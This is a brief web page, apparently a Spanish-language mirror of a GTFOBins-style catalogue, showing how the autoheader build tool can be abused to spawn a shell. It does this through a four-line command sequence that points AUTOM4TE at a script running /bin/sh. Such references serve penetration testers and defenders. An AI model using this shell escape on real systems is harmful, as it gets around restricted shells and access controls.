root@defcon-rd // ./arsenal/gtfobins/autoheader
autoheader
./autoheader --examples
Funciones y ejemplos de uso
shell
echo '/bin/sh 1>&0' >/path/to/temp-file
chmod +x /path/to/temp-file
touch configure.ac
AUTOM4TE=/path/to/temp-file autoheader
./related --binary=autoheader
Binarios relacionados
Comparten al menos una función con autoheader.